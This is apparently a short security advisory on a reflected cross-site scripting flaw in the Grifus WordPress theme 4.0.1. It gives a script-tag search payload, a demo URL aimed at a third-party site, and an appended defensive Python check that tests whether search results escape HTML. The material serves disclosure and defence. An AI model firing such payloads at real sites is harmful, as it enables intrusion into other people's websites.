WordPress Grifus 4.0.1 Cross Site Scripting
Posted on 21 December 2017
======
Title: Grifus WordPress Themes XSS Vuln
Version: 4.0.1
Homepage: https://mundothemes.com/grifus/
=======

Description
================
Grifus is a WordPress theme for movie websites.

POC:
========
1. Go to the target website
2. Click the search box
3. Enter this payload in the search box: " <script>prompt(document.domain)</script> "
4. The XSS payload will be executed

Demo:
======
http://download.lakshmipuronline.com/?s=%3Cscript%3Eprompt%28document.domain%29%3C%2Fscript%3E

Mitigations
================
Update your themes

--
Thanks
Sajibe Kanti
Independent Web Security Researcher
<https://twitter.com/Sajibekantibd>
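
A check to go with the mitigation above, added here as an example and not part of the original advisory or the theme's code: given the HTML a site returns for a search (the `s` parameter), it reports whether HTML metacharacters in the search term come back raw or entity-encoded. The token, probe string and sample response bodies are constructed for illustration, and the script makes no network requests.

```python
import html
import re

# Constructed probe: a unique token around HTML metacharacters, no script content.
TOKEN = "zq7f3a"
METAS = "\"<>'"
PROBE = TOKEN + METAS + TOKEN

# Whatever the page returned between the two tokens (bounded, non-greedy).
_REFLECTED = re.compile(re.escape(TOKEN) + r"(.{0,60}?)" + re.escape(TOKEN), re.S)


def reflections(page_html):
    """Return one finding per place the probe was echoed into the page."""
    findings = []
    for match in _REFLECTED.finditer(page_html):
        middle = match.group(1)
        raw = [c for c in METAS if c in middle]   # metacharacters left unescaped
        if raw:
            state = "raw"
        elif html.unescape(middle) == METAS:
            state = "escaped"                     # entity-encoded, renders as text
        else:
            state = "altered"                     # stripped, URL-encoded, etc.
        findings.append({"offset": match.start(), "state": state, "raw": raw})
    return findings


def search_output_is_escaped(page_html):
    """True only if the probe was echoed and no echo kept a raw metacharacter."""
    found = reflections(page_html)
    return bool(found) and all(f["state"] != "raw" for f in found)


# Constructed response bodies for a search on PROBE; not captured from any real site.
UNPATCHED = ('<title>zq7f3a&quot;&lt;&gt;&#039;zq7f3a</title>\n'
             '<h1>Results for: zq7f3a"<>\'zq7f3a</h1>')
PATCHED = ('<h1>Results for: zq7f3a&quot;&lt;&gt;&#039;zq7f3a</h1>\n'
           '<input name="s" value="zq7f3a&quot;&lt;&gt;&#039;zq7f3a">\n'
           '<a href="/?s=zq7f3a%22%3C%3E%27zq7f3a">link</a>')

if __name__ == "__main__":
    for name, body in (("unpatched", UNPATCHED), ("patched", PATCHED)):
        print(name, search_output_is_escaped(body), reflections(body))
```

A page can escape the term in one place and echo it raw in another, which is why every reflection is reported separately; run the check on your own site's search results page before and after updating the theme.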